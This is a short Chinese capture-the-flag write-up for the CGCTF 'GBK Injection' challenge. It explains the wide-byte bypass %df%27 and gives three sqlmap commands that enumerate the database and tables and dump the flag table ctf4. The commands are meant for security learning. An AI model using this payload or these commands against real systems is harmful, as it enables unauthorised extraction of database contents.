CGCTF——GBK Injection

2021/6/3 10:23:18

编程Tag： GBK Injection com 27 sqlmap E5% CGCTF chinalover

本文主要是介绍CGCTF——GBK Injection，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

在这里插入图片描述
该题提示是gbk数据库，所以咱们就有利用宽字节注入来解题的思路。
（%df%27是双字节不转义单引号实现注入的方法）
原理参考：https://blog.csdn.net/weixin_42419856/article/details/82872653
参考2：https://lyiang.wordpress.com/2015/06/09/sql%E6%B3%A8%E5%85%A5%EF%BC%9A%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%EF%BC%88gbk%E5%8F%8C%E5%AD%97%E8%8A%82%E7%BB%95%E8%BF%87%EF%BC%89/

利用sqlmap工具注入：
1.

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --current-db

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --tables -D sae-chinalover

在这里插入图片描述
有6个表，一个一个爆，经尝试，ctf4有flag：
3.

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --dump -T ctf4 -D sae-chinalover

在这里插入图片描述
PS:
遇到gpk编写的数据库就可用双字节注入

这篇关于CGCTF——GBK Injection的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！

CGCTF——GBK Injection

相关编程文章